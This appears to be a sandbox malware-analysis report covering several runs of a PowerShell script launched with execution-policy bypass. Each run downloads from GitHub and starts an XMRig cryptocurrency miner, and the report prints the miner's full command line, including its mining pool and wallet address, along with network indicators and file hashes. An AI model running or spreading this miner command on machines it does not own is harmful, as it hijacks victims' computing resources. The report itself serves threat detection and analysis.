Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

memory/3464-0-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yxkm0so.1nj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:02

Platform

win10v2004-20240426-en

Max time kernel

1788s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/1280-0-0x00007FF84FA83000-0x00007FF84FA85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lzqjcikr.o41.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win7-20240221-en

Max time kernel

1560s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:32

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvdhazqj.osn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:33

Platform

win10v2004-20240508-en

Max time kernel

1800s

Max time network

1743s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.178.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nvbedppy.ow3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1745s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vozucatt.w1y.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1769s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v52usm3x.xev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eah22axt.qii.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win11-20240426-en

Max time kernel

1791s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

